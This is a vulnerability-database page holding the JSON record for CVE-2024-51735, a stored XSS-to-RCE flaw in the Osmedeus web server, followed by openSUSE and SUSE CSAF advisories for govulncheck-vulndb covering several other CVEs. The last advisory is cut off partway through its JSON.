Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2024-51735 (GCVE-0-2024-51735)
Vulnerability from cvelistv5
{ "containers": { "adp": [ { "affected": [ { "cpes": [ "cpe:2.3:a:j3ssie:osmedeus:*:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "osmedeus", "vendor": "j3ssie", "versions": [ { "lessThanOrEqual": "4.6.4", "status": "affected", "version": "0", "versionType": "custom" } ] } ], "metrics": [ { "other": { "content": { "id": "CVE-2024-51735", "options": [ { "Exploitation": "none" }, { "Automatable": "yes" }, { "Technical Impact": "total" } ], "role": "CISA Coordinator", "timestamp": "2024-11-05T21:46:21.004522Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-11-05T21:47:36.314Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "product": "osmedeus", "vendor": "j3ssie", "versions": [ { "status": "affected", "version": "\u003c= 4.6.4" } ] } ], "descriptions": [ { "lang": "en", "value": "Osmedeus is a Workflow Engine for Offensive Security. Cross-site Scripting (XSS) occurs on the Osmedues web server when viewing results from the workflow, allowing commands to be executed on the server. When using a workflow that contains the summary module, it generates reports in HTML and Markdown formats. The default report is based on the `general-template.md` template.The contents of the files are read and used to generate the report. However, the file contents are not properly filtered, leading to XSS. This may lead to commands executed on the host as well. This issue is not yet resolved. Users are advised to add their own filtering or to reach out to the developer to aid in developing a patch." } ], "metrics": [ { "cvssV4_0": { "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "baseScore": 8.7, "baseSeverity": "HIGH", "privilegesRequired": "NONE", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "PASSIVE", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N", "version": "4.0", "vulnAvailabilityImpact": "HIGH", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-79", "description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)", "lang": "en", "type": "CWE" } ] }, { "descriptions": [ { "cweId": "CWE-80", "description": "CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-05T18:49:05.950Z", "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa", "shortName": "GitHub_M" }, "references": [ { "name": "https://github.com/j3ssie/osmedeus/security/advisories/GHSA-wvv7-wm5v-w2gv", "tags": [ "x_refsource_CONFIRM" ], "url": "https://github.com/j3ssie/osmedeus/security/advisories/GHSA-wvv7-wm5v-w2gv" } ], "source": { "advisory": "GHSA-wvv7-wm5v-w2gv", "discovery": "UNKNOWN" }, "title": "Stored Cross-site Scripting to RCE on Osmedeus Web Server" } }, "cveMetadata": { "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa", "assignerShortName": "GitHub_M", "cveId": "CVE-2024-51735", "datePublished": "2024-11-05T18:49:05.950Z", "dateReserved": "2024-10-31T14:12:45.788Z", "dateUpdated": "2024-11-05T21:47:36.314Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1", "vulnerability-lookup:meta": { "nvd": "{\"cve\":{\"id\":\"CVE-2024-51735\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-11-05T19:15:07.947\",\"lastModified\":\"2024-11-06T18:17:17.287\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Osmedeus is a Workflow Engine for Offensive Security. Cross-site Scripting (XSS) occurs on the Osmedues web server when viewing results from the workflow, allowing commands to be executed on the server. When using a workflow that contains the summary module, it generates reports in HTML and Markdown formats. The default report is based on the `general-template.md` template.The contents of the files are read and used to generate the report. However, the file contents are not properly filtered, leading to XSS. This may lead to commands executed on the host as well. This issue is not yet resolved. Users are advised to add their own filtering or to reach out to the developer to aid in developing a patch.\"},{\"lang\":\"es\",\"value\":\"Osmedeus es un motor de workflow para seguridad ofensiva. Se produce un ataque de Cross Site Scripting (XSS) en el servidor web de Osmedeus cuando se visualizan los resultados del workflow, lo que permite ejecutar comandos en el servidor. Cuando se utiliza un workflow que contiene el m\u00f3dulo de resumen, se generan informes en formatos HTML y Markdown. El informe predeterminado se basa en la plantilla `general-template.md`. Se leen los contenidos de los archivos y se utilizan para generar el informe. Sin embargo, los contenidos de los archivos no se filtran correctamente, lo que genera un ataque de Cross Site Scripting (XSS). Esto tambi\u00e9n puede provocar la ejecuci\u00f3n de comandos en el host. Este problema a\u00fan no se ha resuelto. Se recomienda a los usuarios que agreguen su propio filtrado o que se pongan en contacto con el desarrollador para que les ayude a desarrollar un parche.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.7,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"PASSIVE\",\"vulnerableSystemConfidentiality\":\"HIGH\",\"vulnerableSystemIntegrity\":\"HIGH\",\"vulnerableSystemAvailability\":\"HIGH\",\"subsequentSystemConfidentiality\":\"NONE\",\"subsequentSystemIntegrity\":\"NONE\",\"subsequentSystemAvailability\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirements\":\"NOT_DEFINED\",\"integrityRequirements\":\"NOT_DEFINED\",\"availabilityRequirements\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnerableSystemConfidentiality\":\"NOT_DEFINED\",\"modifiedVulnerableSystemIntegrity\":\"NOT_DEFINED\",\"modifiedVulnerableSystemAvailability\":\"NOT_DEFINED\",\"modifiedSubsequentSystemConfidentiality\":\"NOT_DEFINED\",\"modifiedSubsequentSystemIntegrity\":\"NOT_DEFINED\",\"modifiedSubsequentSystemAvailability\":\"NOT_DEFINED\",\"safety\":\"NOT_DEFINED\",\"automatable\":\"NOT_DEFINED\",\"recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"},{\"lang\":\"en\",\"value\":\"CWE-80\"}]}],\"references\":[{\"url\":\"https://github.com/j3ssie/osmedeus/security/advisories/GHSA-wvv7-wm5v-w2gv\",\"source\":\"security-advisories@github.com\"}]}}", "vulnrichment": { "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-51735\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-11-05T21:46:21.004522Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:j3ssie:osmedeus:*:*:*:*:*:*:*:*\"], \"vendor\": \"j3ssie\", \"product\": \"osmedeus\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"versionType\": \"custom\", \"lessThanOrEqual\": \"4.6.4\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-11-05T21:47:32.417Z\"}}], \"cna\": {\"title\": \"Stored Cross-site Scripting to RCE on Osmedeus Web Server\", \"source\": {\"advisory\": \"GHSA-wvv7-wm5v-w2gv\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 8.7, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N\", \"userInteraction\": \"PASSIVE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"j3ssie\", \"product\": \"osmedeus\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 4.6.4\"}]}], \"references\": [{\"url\": \"https://github.com/j3ssie/osmedeus/security/advisories/GHSA-wvv7-wm5v-w2gv\", \"name\": \"https://github.com/j3ssie/osmedeus/security/advisories/GHSA-wvv7-wm5v-w2gv\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Osmedeus is a Workflow Engine for Offensive Security. Cross-site Scripting (XSS) occurs on the Osmedues web server when viewing results from the workflow, allowing commands to be executed on the server. When using a workflow that contains the summary module, it generates reports in HTML and Markdown formats. The default report is based on the `general-template.md` template.The contents of the files are read and used to generate the report. However, the file contents are not properly filtered, leading to XSS. This may lead to commands executed on the host as well. This issue is not yet resolved. Users are advised to add their own filtering or to reach out to the developer to aid in developing a patch.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-79\", \"description\": \"CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-80\", \"description\": \"CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2024-11-05T18:49:05.950Z\"}}}", "cveMetadata": "{\"cveId\": \"CVE-2024-51735\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2024-11-05T21:47:36.314Z\", \"dateReserved\": \"2024-10-31T14:12:45.788Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2024-11-05T18:49:05.950Z\", \"assignerShortName\": \"GitHub_M\"}", "dataType": "CVE_RECORD", "dataVersion": "5.1" } } }
opensuse-su-2024:14470-1
Vulnerability from csaf_opensuse
Notes
{ "document": { "aggregate_severity": { "namespace": "https://www.suse.com/support/security/rating/", "text": "moderate" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright 2024 SUSE LLC. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "govulncheck-vulndb-0.0.20241106T172143-1.1 on GA media", "title": "Title of the patch" }, { "category": "description", "text": "These are all security issues fixed in the govulncheck-vulndb-0.0.20241106T172143-1.1 package on the GA media of openSUSE Tumbleweed.", "title": "Description of the patch" }, { "category": "details", "text": "openSUSE-Tumbleweed-2024-14470", "title": "Patchnames" }, { "category": "legal_disclaimer", "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", "title": "Terms of use" } ], "publisher": { "category": "vendor", "contact_details": "https://www.suse.com/support/security/contact/", "name": "SUSE Product Security Team", "namespace": "https://www.suse.com/" }, "references": [ { "category": "external", "summary": "SUSE ratings", "url": "https://www.suse.com/support/security/rating/" }, { "category": "self", "summary": "URL of this CSAF notice", "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_14470-1.json" }, { "category": "self", "summary": "URL for openSUSE-SU-2024:14470-1", "url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/OX53GMPD3MLNI5INQF5WZ3M4WW7BFHZC/" }, { "category": "self", "summary": "E-Mail link for openSUSE-SU-2024:14470-1", "url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/OX53GMPD3MLNI5INQF5WZ3M4WW7BFHZC/" }, { "category": "self", "summary": "SUSE CVE CVE-2024-10389 page", "url": "https://www.suse.com/security/cve/CVE-2024-10389/" }, { "category": "self", "summary": "SUSE CVE CVE-2024-48057 page", "url": "https://www.suse.com/security/cve/CVE-2024-48057/" }, { "category": "self", "summary": "SUSE CVE CVE-2024-51735 page", "url": "https://www.suse.com/security/cve/CVE-2024-51735/" }, { "category": "self", "summary": "SUSE CVE CVE-2024-51746 page", "url": "https://www.suse.com/security/cve/CVE-2024-51746/" } ], "title": "govulncheck-vulndb-0.0.20241106T172143-1.1 on GA media", "tracking": { "current_release_date": "2024-11-07T00:00:00Z", "generator": { "date": "2024-11-07T00:00:00Z", "engine": { "name": "cve-database.git:bin/generate-csaf.pl", "version": "1" } }, "id": "openSUSE-SU-2024:14470-1", "initial_release_date": "2024-11-07T00:00:00Z", "revision_history": [ { "date": "2024-11-07T00:00:00Z", "number": "1", "summary": "Current version" } ], "status": "final", "version": "1" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version", "name": "govulncheck-vulndb-0.0.20241106T172143-1.1.aarch64", "product": { "name": "govulncheck-vulndb-0.0.20241106T172143-1.1.aarch64", "product_id": "govulncheck-vulndb-0.0.20241106T172143-1.1.aarch64" } } ], "category": "architecture", "name": "aarch64" }, { "branches": [ { "category": "product_version", "name": "govulncheck-vulndb-0.0.20241106T172143-1.1.ppc64le", "product": { "name": "govulncheck-vulndb-0.0.20241106T172143-1.1.ppc64le", "product_id": "govulncheck-vulndb-0.0.20241106T172143-1.1.ppc64le" } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "govulncheck-vulndb-0.0.20241106T172143-1.1.s390x", "product": { "name": "govulncheck-vulndb-0.0.20241106T172143-1.1.s390x", "product_id": "govulncheck-vulndb-0.0.20241106T172143-1.1.s390x" } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": "govulncheck-vulndb-0.0.20241106T172143-1.1.x86_64", "product": { "name": "govulncheck-vulndb-0.0.20241106T172143-1.1.x86_64", "product_id": "govulncheck-vulndb-0.0.20241106T172143-1.1.x86_64" } } ], "category": "architecture", "name": "x86_64" }, { "branches": [ { "category": "product_name", "name": "openSUSE Tumbleweed", "product": { "name": "openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed", "product_identification_helper": { "cpe": "cpe:/o:opensuse:tumbleweed" } } } ], "category": "product_family", "name": "SUSE Linux Enterprise" } ], "category": "vendor", "name": "SUSE" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "govulncheck-vulndb-0.0.20241106T172143-1.1.aarch64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.aarch64" }, "product_reference": "govulncheck-vulndb-0.0.20241106T172143-1.1.aarch64", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "govulncheck-vulndb-0.0.20241106T172143-1.1.ppc64le as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.ppc64le" }, "product_reference": "govulncheck-vulndb-0.0.20241106T172143-1.1.ppc64le", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "govulncheck-vulndb-0.0.20241106T172143-1.1.s390x as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.s390x" }, "product_reference": "govulncheck-vulndb-0.0.20241106T172143-1.1.s390x", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "govulncheck-vulndb-0.0.20241106T172143-1.1.x86_64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.x86_64" }, "product_reference": "govulncheck-vulndb-0.0.20241106T172143-1.1.x86_64", "relates_to_product_reference": "openSUSE Tumbleweed" } ] }, "vulnerabilities": [ { "cve": "CVE-2024-10389", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-10389" } ], "notes": [ { "category": "general", "text": "There exists a Path Traversal vulnerability in Safearchive on Platforms with Case-Insensitive Filesystems (e.g., NTFS). This allows Attackers to Write Arbitrary Files via Archive Extraction containing symbolic links. We recommend upgrading past commit f7ce9d7b6f9c6ecd72d0b0f16216b046e55e44dc", "title": "CVE description" } ], "product_status": { "recommended": [ "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.aarch64", "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.ppc64le", "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.s390x", "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2024-10389", "url": "https://www.suse.com/security/cve/CVE-2024-10389" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.aarch64", "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.ppc64le", "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.s390x", "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.x86_64" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.5, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "products": [ "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.aarch64", "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.ppc64le", "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.s390x", "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2024-11-07T00:00:00Z", "details": "important" } ], "title": "CVE-2024-10389" }, { "cve": "CVE-2024-48057", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-48057" } ], "notes": [ { "category": "general", "text": "localai \u003c=2.20.1 is vulnerable to Cross Site Scripting (XSS). When calling the delete model API and passing inappropriate parameters, it can cause a one-time storage XSS, which will trigger the payload when a user accesses the homepage.", "title": "CVE description" } ], "product_status": { "recommended": [ "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.aarch64", "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.ppc64le", "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.s390x", "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2024-48057", "url": "https://www.suse.com/security/cve/CVE-2024-48057" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.aarch64", "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.ppc64le", "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.s390x", "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2024-11-07T00:00:00Z", "details": "moderate" } ], "title": "CVE-2024-48057" }, { "cve": "CVE-2024-51735", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-51735" } ], "notes": [ { "category": "general", "text": "Osmedeus is a Workflow Engine for Offensive Security. Cross-site Scripting (XSS) occurs on the Osmedues web server when viewing results from the workflow, allowing commands to be executed on the server. When using a workflow that contains the summary module, it generates reports in HTML and Markdown formats. The default report is based on the `general-template.md` template.The contents of the files are read and used to generate the report. However, the file contents are not properly filtered, leading to XSS. This may lead to commands executed on the host as well. This issue is not yet resolved. Users are advised to add their own filtering or to reach out to the developer to aid in developing a patch.", "title": "CVE description" } ], "product_status": { "recommended": [ "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.aarch64", "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.ppc64le", "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.s390x", "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2024-51735", "url": "https://www.suse.com/security/cve/CVE-2024-51735" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.aarch64", "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.ppc64le", "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.s390x", "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2024-11-07T00:00:00Z", "details": "important" } ], "title": "CVE-2024-51735" }, { "cve": "CVE-2024-51746", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-51746" } ], "notes": [ { "category": "general", "text": "Gitsign is a keyless Sigstore to signing tool for Git commits with your a GitHub / OIDC identity. gitsign may select the wrong Rekor entry to use during online verification when multiple entries are returned by the log. gitsign uses Rekor\u0027s search API to fetch entries that apply to a signature being verified. The parameters used for the search are the public key and the payload. The search API returns entries that match either condition rather than both. When gitsign\u0027s credential cache is used, there can be multiple entries that use the same ephemeral keypair / signing certificate. As gitsign assumes both conditions are matched by Rekor, there is no additional validation that the entry\u0027s hash matches the payload being verified, meaning that the wrong entry can be used to successfully pass verification. Impact is minimal as while gitsign does not match the payload against the entry, it does ensure that the certificate matches. This would need to be exploited during the certificate validity window (10 minutes) by the key holder.", "title": "CVE description" } ], "product_status": { "recommended": [ "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.aarch64", "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.ppc64le", "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.s390x", "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2024-51746", "url": "https://www.suse.com/security/cve/CVE-2024-51746" }, { "category": "external", "summary": "SUSE Bug 1232903 for CVE-2024-51746", "url": "https://bugzilla.suse.com/1232903" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.aarch64", "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.ppc64le", "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.s390x", "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241106T172143-1.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2024-11-07T00:00:00Z", "details": "low" } ], "title": "CVE-2024-51746" } ] }
suse-su-2024:4042-1
Vulnerability from csaf_suse
Notes
{ "document": { "aggregate_severity": { "namespace": "https://www.suse.com/support/security/rating/", "text": "important" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright 2024 SUSE LLC. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "Security update for govulncheck-vulndb", "title": "Title of the patch" }, { "category": "description", "text": "This update for govulncheck-vulndb fixes the following issues:\n\n- Update to version 0.0.20241112T145010 2024-11-12T14:50:10Z.\n Refs jsc#PED-11136\n Go CVE Numbering Authority IDs added or updated with aliases:\n * GO-2024-3250 CVE-2024-51744 GHSA-29wx-vh33-7x7r\n\n- Update to version 0.0.20241108T172500 2024-11-08T17:25:00Z.\n Refs jsc#PED-11136\n Go CVE Numbering Authority IDs added or updated with aliases:\n * GO-2024-3260 CVE-2024-45794 GHSA-q78v-cv36-8fxj\n * GO-2024-3262 CVE-2024-10975 GHSA-2w5v-x29g-jw7j\n\n- Update to version 0.0.20241106T172143 2024-11-06T17:21:43Z.\n Refs jsc#PED-11136\n Go CVE Numbering Authority IDs added or updated with aliases:\n * GO-2024-3251 CVE-2024-10389 GHSA-q3rp-vvm7-j8jg\n * GO-2024-3252 CVE-2024-51746 GHSA-8pmp-678w-c8xx\n * GO-2024-3253 CVE-2024-48057 GHSA-ghx4-cgxw-7h9p\n * GO-2024-3254 CVE-2024-51735 GHSA-wvv7-wm5v-w2gv\n", "title": "Description of the patch" }, { "category": "details", "text": "SUSE-2024-4042,SUSE-SLE-Module-Packagehub-Subpackages-15-SP5-2024-4042,SUSE-SLE-Module-Packagehub-Subpackages-15-SP6-2024-4042,openSUSE-SLE-15.5-2024-4042,openSUSE-SLE-15.6-2024-4042", "title": "Patchnames" }, { "category": "legal_disclaimer", "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", "title": "Terms of use" } ], "publisher": { "category": "vendor", "contact_details": "https://www.suse.com/support/security/contact/", "name": "SUSE Product Security Team", "namespace": "https://www.suse.com/" }, "references": [ { "category": "external", "summary": "SUSE ratings", "url": "https://www.suse.com/support/security/rating/" }, { "category": "self", "summary": "URL of this CSAF notice", "url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2024_4042-1.json" }, { "category": "self", "summary": "URL for SUSE-SU-2024:4042-1", "url": "https://www.suse.com/support/update/announcement/2024/suse-su-20244042-1/" }, { "category": "self", "summary": "E-Mail link for SUSE-SU-2024:4042-1", "url": "https://lists.suse.com/pipermail/sle-security-updates/2024-November/019840.html" }, { "category": "self", "summary": "SUSE CVE CVE-2024-10389 page", "url": "https://www.suse.com/security/cve/CVE-2024-10389/" }, { "category": "self", "summary": "SUSE CVE CVE-2024-10975 page", "url": "https://www.suse.com/security/cve/CVE-2024-10975/" }, { "category": "self", "summary": "SUSE CVE CVE-2024-45794 page", "url": "https://www.suse.com/security/cve/CVE-2024-45794/" }, { "category": "self", "summary": "SUSE CVE CVE-2024-48057 page", "url": "https://www.suse.com/security/cve/CVE-2024-48057/" }, { "category": "self", "summary": "SUSE CVE CVE-2024-51735 page", "url": "https://www.suse.com/security/cve/CVE-2024-51735/" }, { "category": "self", "summary": "SUSE CVE CVE-2024-51744 page", "url": "https://www.suse.com/security/cve/CVE-2024-51744/" }, { "category": "self", "summary": "SUSE CVE CVE-2024-51746 page", "url": "https://www.suse.com/security/cve/CVE-2024-51746/" } ], "title": "Security update for govulncheck-vulndb", "tracking": { "current_release_date": "2024-11-22T10:44:11Z", "generator": { "date": "2024-11-22T10:44:11Z", "engine": { "name": "cve-database.git:bin/generate-csaf.pl", "version": "1" } }, "id": "SUSE-SU-2024:4042-1", "initial_release_date": "2024-11-22T10:44:11Z", "revision_history": [ { "date": "2024-11-22T10:44:11Z", "number": "1", "summary": "Current version" } ], "status": "final", "version": "1" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version", "name": "govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "product": { "name": "govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "product_id": "govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch" } } ], "category": "architecture", "name": "noarch" }, { "branches": [ { "category": "product_name", "name": "SUSE Linux Enterprise Module for Package Hub 15 SP5", "product": { "name": "SUSE Linux Enterprise Module for Package Hub 15 SP5", "product_id": "SUSE Linux Enterprise Module for Package Hub 15 SP5", "product_identification_helper": { "cpe": "cpe:/o:suse:packagehub:15:sp5" } } }, { "category": "product_name", "name": "SUSE Linux Enterprise Module for Package Hub 15 SP6", "product": { "name": "SUSE Linux Enterprise Module for Package Hub 15 SP6", "product_id": "SUSE Linux Enterprise Module for Package Hub 15 SP6", "product_identification_helper": { "cpe": "cpe:/o:suse:packagehub:15:sp6" } } }, { "category": "product_name", "name": "openSUSE Leap 15.5", "product": { "name": "openSUSE Leap 15.5", "product_id": "openSUSE 